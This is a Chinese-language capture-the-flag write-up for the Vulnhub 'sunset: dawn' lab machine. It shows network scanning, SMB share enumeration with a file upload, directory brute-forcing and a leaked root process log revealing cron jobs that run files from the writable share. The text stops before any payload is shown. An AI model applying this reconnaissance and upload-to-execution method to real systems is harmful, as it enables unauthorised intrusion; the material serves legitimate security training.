Vulnhub之Sunset Dawn靶机详细测试过程
Sunset : Dawn
作者: jason_huawen
靶机基本信息
名称:sunset: dawn
地址:
https://www.vulnhub.com/entry/sunset-dawn,341/
提示:dawn is a boot2root machine with a difficulty designed to be Easy with
multiple ways to be completed. It is recommended to use Virtualbox.
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.67.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.100 08:00:27:55:6f:ee 2 120 PCS Systemtechnik GmbH
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.251 08:00:27:2a:fd:f3 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.251
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.251 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-03 21:26 EST
Nmap scan report for localhost (192.168.56.251)
Host is up (0.00015s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.15-MariaDB-1
| Thread ID: 13
| Capabilities flags: 63486
| Some Capabilities: SupportsCompression, Speaks41ProtocolOld, ConnectWithDatabase, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, LongColumnFlag, InteractiveClient, ODBCClient, Speaks41ProtocolNew, SupportsLoadDataLocal, Support41Auth, FoundRows, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: 8~6.$hc8.z@n+((/P)w@
|_ Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:2A:FD:F3 (Oracle VirtualBox virtual NIC)
Service Info: Host: DAWN
Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
| smb2-time:
| date: 2022-12-04T02:27:09
|_ start_date: N/A
|_nbstat: NetBIOS name: DAWN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: dawn
| NetBIOS computer name: DAWN\x00
| Domain name: dawn
| FQDN: dawn.dawn
|_ System time: 2022-12-03T21:27:09-05:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.15 seconds
NMAP扫描结果表明目标主机有4个开放端口:22(SSH)、80(HTTP)、139/445(SMB)、3306(mysql)
获得Shell
先看一下MySQL有无弱密码:
┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ mysql -uroot -p -h 192.168.56.251
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: NO)
┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ mysql -uroot -p -h 192.168.56.251
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: YES)
┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ smbclient -L 192.168.56.251
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
ITDEPT Disk PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP DAWN
┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ smbclient //192.168.56.251/ITDEPT
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Aug 2 23:23:20 2019
.. D 0 Fri Aug 2 23:21:39 2019
7158264 blocks of size 1024. 3501116 blocks available
smb: \> ls -alh
NT_STATUS_NO_SUCH_FILE listing \-alh
smb: \> ls
. D 0 Fri Aug 2 23:23:20 2019
.. D 0 Fri Aug 2 23:21:39 2019
7158264 blocks of size 1024. 3501116 blocks available
smb: \> put test.txt
putting file test.txt as \test.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \> ls
. D 0 Sat Dec 3 21:30:48 2022
.. D 0 Fri Aug 2 23:21:39 2019
test.txt A 0 Sat Dec 3 21:30:48 2022
7158264 blocks of size 1024. 3501116 blocks available
smb: \>
经过测试发现可以通过SMB服务上传文件。
──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ gobuster dir -u http://192.168.56.251 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.251
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/03 21:32:29 Starting gobuster in directory enumeration mode
===============================================================
/logs (Status: 301) [Size: 315] [--> http://192.168.56.251/logs/]
/cctv (Status: 301) [Size: 315] [--> http://192.168.56.251/cctv/]
/server-status (Status: 403) [Size: 302]
Progress: 219019 / 220561 (99.30%)===============================================================
2022/12/03 21:32:57 Finished
===============================================================
访问/logs目录,除了management.log可以访问下载外,其他都被禁止访问
┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ mv ~/Downloads/management.log .
┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ cat management.log
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2022/12/03 21:15:31 CMD: UID=0 PID=95 |
2022/12/03 21:15:31 CMD: UID=0 PID=9 |
2022/12/03 21:15:31 CMD: UID=0 PID=8 |
2022/12/03 21:15:31 CMD: UID=0 PID=7 |
2022/12/03 21:15:31 CMD: UID=0 PID=628 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:15:31 CMD: UID=0 PID=613 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:15:31 CMD: UID=0 PID=612 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:15:31 CMD: UID=0 PID=6 |
2022/12/03 21:15:31 CMD: UID=0 PID=594 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:15:31 CMD: UID=0 PID=58 |
2022/12/03 21:15:31 CMD: UID=33 PID=576 | /usr/sbin/apache2 -k start
2022/12/03 21:15:31 CMD: UID=33 PID=575 | /usr/sbin/apache2 -k start
2022/12/03 21:15:31 CMD: UID=33 PID=574 | /usr/sbin/apache2 -k start
2022/12/03 21:15:31 CMD: UID=33 PID=573 | /usr/sbin/apache2 -k start
2022/12/03 21:15:31 CMD: UID=33 PID=572 | /usr/sbin/apache2 -k start
2022/12/03 21:15:31 CMD: UID=0 PID=541 | /usr/sbin/apache2 -k start
2022/12/03 21:15:31 CMD: UID=112 PID=536 | /usr/sbin/mysqld
2022/12/03 21:15:31 CMD: UID=0 PID=5 |
2022/12/03 21:15:31 CMD: UID=0 PID=49 |
2022/12/03 21:15:31 CMD: UID=0 PID=48 |
2022/12/03 21:15:31 CMD: UID=0 PID=47 |
2022/12/03 21:15:31 CMD: UID=0 PID=446 | /root/pspy64
2022/12/03 21:15:31 CMD: UID=0 PID=445 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2022/12/03 21:15:31 CMD: UID=0 PID=443 | /usr/sbin/cups-browsed
2022/12/03 21:15:31 CMD: UID=0 PID=440 | /usr/sbin/nmbd --foreground --no-process-group
2022/12/03 21:15:31 CMD: UID=107 PID=437 | avahi-daemon: chroot helper
2022/12/03 21:15:31 CMD: UID=0 PID=435 | /bin/sh -c /root/pspy64 > /var/www/html/logs/management.log
2022/12/03 21:15:31 CMD: UID=0 PID=422 | /usr/sbin/CRON -f
2022/12/03 21:15:31 CMD: UID=0 PID=406 | /usr/sbin/anacron -d -q -s
2022/12/03 21:15:31 CMD: UID=0 PID=403 | /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
2022/12/03 21:15:31 CMD: UID=0 PID=402 | /usr/sbin/cupsd -l
2022/12/03 21:15:31 CMD: UID=0 PID=401 | /usr/sbin/cron -f
2022/12/03 21:15:31 CMD: UID=0 PID=4 |
2022/12/03 21:15:31 CMD: UID=104 PID=399 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2022/12/03 21:15:31 CMD: UID=0 PID=398 | /usr/sbin/rsyslogd -n -iNONE
2022/12/03 21:15:31 CMD: UID=107 PID=397 | avahi-daemon: running [dawn.local]
2022/12/03 21:15:31 CMD: UID=0 PID=396 | /lib/systemd/systemd-logind
2022/12/03 21:15:31 CMD: UID=0 PID=344 | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
2022/12/03 21:15:31 CMD: UID=0 PID=311 |
2022/12/03 21:15:31 CMD: UID=0 PID=308 |
2022/12/03 21:15:31 CMD: UID=0 PID=3 |
2022/12/03 21:15:31 CMD: UID=0 PID=29 |
2022/12/03 21:15:31 CMD: UID=0 PID=28 |
2022/12/03 21:15:31 CMD: UID=0 PID=27 |
2022/12/03 21:15:31 CMD: UID=0 PID=26 |
2022/12/03 21:15:31 CMD: UID=101 PID=250 | /lib/systemd/systemd-timesyncd
2022/12/03 21:15:31 CMD: UID=0 PID=25 |
2022/12/03 21:15:31 CMD: UID=0 PID=241 | /lib/systemd/systemd-udevd
2022/12/03 21:15:31 CMD: UID=0 PID=24 |
2022/12/03 21:15:31 CMD: UID=0 PID=23 |
2022/12/03 21:15:31 CMD: UID=0 PID=22 |
2022/12/03 21:15:31 CMD: UID=0 PID=218 | /lib/systemd/systemd-journald
2022/12/03 21:15:31 CMD: UID=0 PID=21 |
2022/12/03 21:15:31 CMD: UID=0 PID=20 |
2022/12/03 21:15:31 CMD: UID=0 PID=2 |
2022/12/03 21:15:31 CMD: UID=0 PID=19 |
2022/12/03 21:15:31 CMD: UID=0 PID=187 |
2022/12/03 21:15:31 CMD: UID=0 PID=186 |
2022/12/03 21:15:31 CMD: UID=0 PID=184 |
2022/12/03 21:15:31 CMD: UID=0 PID=18 |
2022/12/03 21:15:31 CMD: UID=0 PID=17 |
2022/12/03 21:15:31 CMD: UID=0 PID=16 |
2022/12/03 21:15:31 CMD: UID=0 PID=157 |
2022/12/03 21:15:31 CMD: UID=0 PID=154 |
2022/12/03 21:15:31 CMD: UID=0 PID=152 |
2022/12/03 21:15:31 CMD: UID=0 PID=15 |
2022/12/03 21:15:31 CMD: UID=0 PID=14 |
2022/12/03 21:15:31 CMD: UID=0 PID=13 |
2022/12/03 21:15:31 CMD: UID=0 PID=12 |
2022/12/03 21:15:31 CMD: UID=0 PID=119 |
2022/12/03 21:15:31 CMD: UID=0 PID=114 |
2022/12/03 21:15:31 CMD: UID=0 PID=113 |
2022/12/03 21:15:31 CMD: UID=0 PID=111 |
2022/12/03 21:15:31 CMD: UID=0 PID=110 |
2022/12/03 21:15:31 CMD: UID=0 PID=11 |
2022/12/03 21:15:31 CMD: UID=0 PID=108 |
2022/12/03 21:15:31 CMD: UID=0 PID=107 |
2022/12/03 21:15:31 CMD: UID=0 PID=106 |
2022/12/03 21:15:31 CMD: UID=0 PID=104 |
2022/12/03 21:15:31 CMD: UID=0 PID=102 |
2022/12/03 21:15:31 CMD: UID=0 PID=10 |
2022/12/03 21:15:31 CMD: UID=0 PID=1 | /sbin/init
2022/12/03 21:16:01 CMD: UID=0 PID=643 | /usr/sbin/CRON -f
2022/12/03 21:16:01 CMD: UID=0 PID=642 | /usr/sbin/cron -f
2022/12/03 21:16:01 CMD: UID=0 PID=641 | /usr/sbin/cron -f
2022/12/03 21:16:01 CMD: UID=0 PID=640 | /usr/sbin/cron -f
2022/12/03 21:16:01 CMD: UID=0 PID=639 | /usr/sbin/cron -f
2022/12/03 21:16:01 CMD: UID=0 PID=647 | /usr/sbin/CRON -f
2022/12/03 21:16:01 CMD: UID=0 PID=646 | /usr/sbin/CRON -f
2022/12/03 21:16:01 CMD: UID=0 PID=645 | /usr/sbin/CRON -f
2022/12/03 21:16:01 CMD: UID=0 PID=644 | /usr/sbin/CRON -f
2022/12/03 21:16:01 CMD: UID=0 PID=650 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:16:01 CMD: UID=0 PID=649 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2022/12/03 21:16:01 CMD: UID=0 PID=648 | /usr/sbin/CRON -f
2022/12/03 21:16:01 CMD: UID=1000 PID=652 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:16:01 CMD: UID=0 PID=651 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:16:01 CMD: UID=33 PID=653 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:17:01 CMD: UID=0 PID=660 | /usr/sbin/CRON -f
2022/12/03 21:17:01 CMD: UID=0 PID=659 | /usr/sbin/cron -f
2022/12/03 21:17:01 CMD: UID=0 PID=658 | /usr/sbin/cron -f
2022/12/03 21:17:01 CMD: UID=0 PID=657 | /usr/sbin/cron -f
2022/12/03 21:17:01 CMD: UID=0 PID=656 | /usr/sbin/cron -f
2022/12/03 21:17:01 CMD: UID=0 PID=655 | /usr/sbin/cron -f
2022/12/03 21:17:01 CMD: UID=0 PID=667 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:17:01 CMD: UID=0 PID=666 | /usr/sbin/CRON -f
2022/12/03 21:17:01 CMD: UID=0 PID=665 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:17:01 CMD: UID=0 PID=664 | /usr/sbin/CRON -f
2022/12/03 21:17:01 CMD: UID=0 PID=663 | /usr/sbin/CRON -f
2022/12/03 21:17:01 CMD: UID=0 PID=662 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:17:01 CMD: UID=0 PID=661 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:17:01 CMD: UID=0 PID=671 | /usr/sbin/CRON -f
2022/12/03 21:17:01 CMD: UID=0 PID=672 | /bin/sh -c cd / && run-parts --report /etc/cron.hourly
2022/12/03 21:18:01 CMD: UID=0 PID=677 | /usr/sbin/CRON -f
2022/12/03 21:18:01 CMD: UID=0 PID=676 | /usr/sbin/cron -f
2022/12/03 21:18:01 CMD: UID=0 PID=675 | /usr/sbin/cron -f
2022/12/03 21:18:01 CMD: UID=0 PID=674 | /usr/sbin/cron -f
2022/12/03 21:18:01 CMD: UID=0 PID=673 | /usr/sbin/cron -f
2022/12/03 21:18:01 CMD: UID=0 PID=679 | /usr/sbin/CRON -f
2022/12/03 21:18:01 CMD: UID=0 PID=678 | /usr/sbin/CRON -f
2022/12/03 21:18:01 CMD: UID=0 PID=680 | /usr/sbin/CRON -f
2022/12/03 21:18:01 CMD: UID=0 PID=683 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2022/12/03 21:18:01 CMD: UID=0 PID=682 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:18:01 CMD: UID=0 PID=681 | /usr/sbin/CRON -f
2022/12/03 21:18:01 CMD: UID=0 PID=686 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:18:01 CMD: UID=1000 PID=685 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:18:01 CMD: UID=0 PID=684 | /usr/sbin/CRON -f
2022/12/03 21:18:01 CMD: UID=33 PID=687 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:19:01 CMD: UID=0 PID=692 | /usr/sbin/CRON -f
2022/12/03 21:19:01 CMD: UID=0 PID=691 | /usr/sbin/cron -f
2022/12/03 21:19:01 CMD: UID=0 PID=690 | /usr/sbin/cron -f
2022/12/03 21:19:01 CMD: UID=0 PID=689 | /usr/sbin/cron -f
2022/12/03 21:19:01 CMD: UID=0 PID=688 | /usr/sbin/cron -f
2022/12/03 21:19:01 CMD: UID=0 PID=695 | /usr/sbin/CRON -f
2022/12/03 21:19:01 CMD: UID=0 PID=694 | /usr/sbin/CRON -f
2022/12/03 21:19:01 CMD: UID=0 PID=693 | /usr/sbin/CRON -f
2022/12/03 21:19:01 CMD: UID=0 PID=698 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2022/12/03 21:19:01 CMD: UID=0 PID=697 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:19:01 CMD: UID=0 PID=696 | /usr/sbin/CRON -f
2022/12/03 21:19:01 CMD: UID=0 PID=699 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:19:01 CMD: UID=0 PID=700 | /usr/sbin/CRON -f
2022/12/03 21:19:01 CMD: UID=1000 PID=701 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:19:01 CMD: UID=33 PID=702 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:19:56 CMD: UID=0 PID=703 | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
2022/12/03 21:19:56 CMD: UID=0 PID=704 | /bin/sh /sbin/dhclient-script
2022/12/03 21:19:56 CMD: UID=0 PID=705 | /bin/sh /sbin/dhclient-script
2022/12/03 21:19:56 CMD: UID=0 PID=706 | /bin/sh /sbin/dhclient-script
2022/12/03 21:19:56 CMD: UID=0 PID=707 | /bin/sh /sbin/dhclient-script
2022/12/03 21:19:56 CMD: UID=0 PID=708 | /bin/sh /sbin/dhclient-script
2022/12/03 21:19:56 CMD: UID=0 PID=709 | /sbin/init
2022/12/03 21:19:56 CMD: UID=0 PID=711 | /bin/sh /sbin/dhclient-script
2022/12/03 21:19:56 CMD: UID=0 PID=710 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:19:56 CMD: UID=0 PID=712 | /bin/sh /sbin/dhclient-script
2022/12/03 21:20:01 CMD: UID=0 PID=717 | /usr/sbin/CRON -f
2022/12/03 21:20:01 CMD: UID=0 PID=716 | /usr/sbin/cron -f
2022/12/03 21:20:01 CMD: UID=0 PID=715 | /usr/sbin/cron -f
2022/12/03 21:20:01 CMD: UID=0 PID=714 | /usr/sbin/cron -f
2022/12/03 21:20:01 CMD: UID=0 PID=713 | /usr/sbin/cron -f
2022/12/03 21:20:01 CMD: UID=0 PID=721 | /usr/sbin/CRON -f
2022/12/03 21:20:01 CMD: UID=0 PID=720 | /usr/sbin/CRON -f
2022/12/03 21:20:01 CMD: UID=0 PID=719 | /usr/sbin/CRON -f
2022/12/03 21:20:01 CMD: UID=0 PID=718 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:20:01 CMD: UID=0 PID=725 | /usr/sbin/CRON -f
2022/12/03 21:20:01 CMD: UID=0 PID=724 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:20:01 CMD: UID=0 PID=723 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:20:01 CMD: UID=0 PID=722 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2022/12/03 21:20:01 CMD: UID=1000 PID=726 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:20:01 CMD: UID=33 PID=727 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:20:40 CMD: UID=0 PID=728 |
2022/12/03 21:20:43 CMD: UID=0 PID=729 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:21:01 CMD: UID=0 PID=734 | /usr/sbin/CRON -f
2022/12/03 21:21:01 CMD: UID=0 PID=733 | /usr/sbin/cron -f
2022/12/03 21:21:01 CMD: UID=0 PID=732 | /usr/sbin/cron -f
2022/12/03 21:21:01 CMD: UID=0 PID=731 | /usr/sbin/cron -f
2022/12/03 21:21:01 CMD: UID=0 PID=730 | /usr/sbin/cron -f
2022/12/03 21:21:01 CMD: UID=0 PID=736 | /usr/sbin/CRON -f
2022/12/03 21:21:01 CMD: UID=0 PID=735 | /usr/sbin/CRON -f
2022/12/03 21:21:01 CMD: UID=0 PID=739 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:21:01 CMD: UID=0 PID=738 | /usr/sbin/CRON -f
2022/12/03 21:21:01 CMD: UID=0 PID=737 | /usr/sbin/CRON -f
2022/12/03 21:21:01 CMD: UID=1000 PID=743 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:21:01 CMD: UID=0 PID=742 | /usr/sbin/CRON -f
2022/12/03 21:21:01 CMD: UID=0 PID=741 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:21:01 CMD: UID=33 PID=744 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:22:01 CMD: UID=0 PID=749 | /usr/sbin/CRON -f
2022/12/03 21:22:01 CMD: UID=0 PID=748 | /usr/sbin/cron -f
2022/12/03 21:22:01 CMD: UID=0 PID=747 | /usr/sbin/cron -f
2022/12/03 21:22:01 CMD: UID=0 PID=746 | /usr/sbin/cron -f
2022/12/03 21:22:01 CMD: UID=0 PID=745 | /usr/sbin/cron -f
2022/12/03 21:22:01 CMD: UID=0 PID=751 | /usr/sbin/CRON -f
2022/12/03 21:22:01 CMD: UID=0 PID=750 | /usr/sbin/CRON -f
2022/12/03 21:22:01 CMD: UID=0 PID=755 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2022/12/03 21:22:01 CMD: UID=0 PID=754 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:22:01 CMD: UID=0 PID=753 | /usr/sbin/CRON -f
2022/12/03 21:22:01 CMD: UID=0 PID=752 | /usr/sbin/CRON -f
2022/12/03 21:22:01 CMD: UID=0 PID=758 | /usr/sbin/CRON -f
2022/12/03 21:22:01 CMD: UID=1000 PID=757 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:22:01 CMD: UID=0 PID=756 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:22:01 CMD: UID=33 PID=759 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:23:01 CMD: UID=0 PID=764 | /usr/sbin/CRON -f
2022/12/03 21:23:01 CMD: UID=0 PID=763 | /usr/sbin/cron -f
2022/12/03 21:23:01 CMD: UID=0 PID=762 | /usr/sbin/cron -f
2022/12/03 21:23:01 CMD: UID=0 PID=761 | /usr/sbin/cron -f
2022/12/03 21:23:01 CMD: UID=0 PID=760 | /usr/sbin/cron -f
2022/12/03 21:23:01 CMD: UID=0 PID=767 | /usr/sbin/CRON -f
2022/12/03 21:23:01 CMD: UID=0 PID=766 | /usr/sbin/CRON -f
2022/12/03 21:23:01 CMD: UID=0 PID=765 | /usr/sbin/CRON -f
2022/12/03 21:23:01 CMD: UID=0 PID=769 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2022/12/03 21:23:01 CMD: UID=0 PID=768 | /usr/sbin/CRON -f
2022/12/03 21:23:01 CMD: UID=1000 PID=773 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:23:01 CMD: UID=0 PID=772 | /usr/sbin/CRON -f
2022/12/03 21:23:01 CMD: UID=0 PID=771 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:23:01 CMD: UID=0 PID=770 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:23:01 CMD: UID=33 PID=774 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:24:01 CMD: UID=0 PID=779 | /usr/sbin/CRON -f
2022/12/03 21:24:01 CMD: UID=0 PID=778 | /usr/sbin/cron -f
2022/12/03 21:24:01 CMD: UID=0 PID=777 | /usr/sbin/cron -f
2022/12/03 21:24:01 CMD: UID=0 PID=776 | /usr/sbin/cron -f
2022/12/03 21:24:01 CMD: UID=0 PID=775 | /usr/sbin/cron -f
2022/12/03 21:24:01 CMD: UID=0 PID=780 | /usr/sbin/CRON -f
2022/12/03 21:24:01 CMD: UID=0 PID=783 | /usr/sbin/CRON -f
2022/12/03 21:24:01 CMD: UID=0 PID=782 | /usr/sbin/CRON -f
2022/12/03 21:24:01 CMD: UID=0 PID=781 | /usr/sbin/CRON -f
2022/12/03 21:24:01 CMD: UID=0 PID=784 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:24:01 CMD: UID=1000 PID=788 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:24:01 CMD: UID=0 PID=787 | /usr/sbin/CRON -f
2022/12/03 21:24:01 CMD: UID=0 PID=786 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:24:01 CMD: UID=0 PID=785 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2022/12/03 21:24:01 CMD: UID=33 PID=789 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:24:44 CMD: UID=0 PID=790 | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
2022/12/03 21:24:44 CMD: UID=0 PID=791 | /bin/sh /sbin/dhclient-script
2022/12/03 21:24:44 CMD: UID=0 PID=792 | /bin/sh /sbin/dhclient-script
2022/12/03 21:24:44 CMD: UID=0 PID=793 | /bin/sh /sbin/dhclient-script
2022/12/03 21:24:44 CMD: UID=0 PID=794 | /bin/sh /sbin/dhclient-script
2022/12/03 21:24:44 CMD: UID=0 PID=795 | /bin/sh /sbin/dhclient-script
2022/12/03 21:24:44 CMD: UID=0 PID=796 | /sbin/init
2022/12/03 21:24:44 CMD: UID=0 PID=797 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:24:44 CMD: UID=0 PID=798 | /bin/sh /sbin/dhclient-script
2022/12/03 21:24:44 CMD: UID=0 PID=799 | /bin/sh /sbin/dhclient-script
2022/12/03 21:25:01 CMD: UID=0 PID=804 | /usr/sbin/CRON -f
2022/12/03 21:25:01 CMD: UID=0 PID=803 | /usr/sbin/cron -f
2022/12/03 21:25:01 CMD: UID=0 PID=802 | /usr/sbin/cron -f
2022/12/03 21:25:01 CMD: UID=0 PID=801 | /usr/sbin/cron -f
2022/12/03 21:25:01 CMD: UID=0 PID=800 | /usr/sbin/cron -f
2022/12/03 21:25:01 CMD: UID=0 PID=806 | /usr/sbin/CRON -f
2022/12/03 21:25:01 CMD: UID=0 PID=805 | /usr/sbin/CRON -f
2022/12/03 21:25:01 CMD: UID=0 PID=807 | /usr/sbin/CRON -f
2022/12/03 21:25:01 CMD: UID=0 PID=808 | /usr/sbin/CRON -f
2022/12/03 21:25:01 CMD: UID=1000 PID=813 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:25:01 CMD: UID=0 PID=812 | /usr/sbin/CRON -f
2022/12/03 21:25:01 CMD: UID=0 PID=811 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:25:01 CMD: UID=??? PID=810 | ???
2022/12/03 21:25:01 CMD: UID=??? PID=809 | ???
2022/12/03 21:25:01 CMD: UID=33 PID=814 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:25:26 CMD: UID=0 PID=815 | /usr/sbin/anacron -d -q -s
2022/12/03 21:25:26 CMD: UID=0 PID=816 | /bin/sh -c run-parts --report /etc/cron.weekly
2022/12/03 21:25:26 CMD: UID=0 PID=817 | run-parts --report /etc/cron.weekly
2022/12/03 21:25:26 CMD: UID=0 PID=818 | /bin/sh /etc/cron.weekly/0anacron
2022/12/03 21:25:26 CMD: UID=0 PID=819 | anacron -u cron.weekly
2022/12/03 21:25:26 CMD: UID=0 PID=820 | run-parts --report /etc/cron.weekly
2022/12/03 21:25:50 CMD: UID=0 PID=821 |
2022/12/03 21:26:01 CMD: UID=0 PID=826 | /usr/sbin/CRON -f
2022/12/03 21:26:01 CMD: UID=0 PID=825 | /usr/sbin/cron -f
2022/12/03 21:26:01 CMD: UID=0 PID=824 | /usr/sbin/cron -f
2022/12/03 21:26:01 CMD: UID=0 PID=823 | /usr/sbin/cron -f
2022/12/03 21:26:01 CMD: UID=0 PID=822 | /usr/sbin/cron -f
2022/12/03 21:26:01 CMD: UID=0 PID=827 | /usr/sbin/CRON -f
2022/12/03 21:26:01 CMD: UID=0 PID=829 | /usr/sbin/CRON -f
2022/12/03 21:26:01 CMD: UID=0 PID=828 | /usr/sbin/CRON -f
2022/12/03 21:26:01 CMD: UID=0 PID=832 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
